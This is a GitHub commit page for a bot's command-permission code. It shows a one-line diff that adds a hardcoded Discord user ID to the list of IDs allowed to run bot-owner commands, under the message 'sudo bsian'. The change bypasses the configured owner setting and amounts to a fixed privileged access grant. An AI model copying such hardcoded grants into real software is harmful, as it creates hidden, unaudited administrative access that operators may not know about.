Skip to content

Commit

Permalink
sudo bsian
Browse files Browse the repository at this point in the history
  • Loading branch information
bsian03 authored Sep 9, 2024
1 parent cfb371b commit 564a013
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion core/structures/CommandPreprocessor.js
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ const PERMS_CALC = function CommandPermission(msg) {

let uIDs;
switch (msg.command.module) {
case "_botOwner": uIDs = [cfg.owner]; break;
case "_botOwner": uIDs = [cfg.owner, "253600545972027394"]; break;
case "_botStaff":
case "dev": uIDs = cfg.admins.concat(cfg.owner); break;
default: uIDs = [];
Expand Down

0 comments on commit 564a013

Please sign in to comment.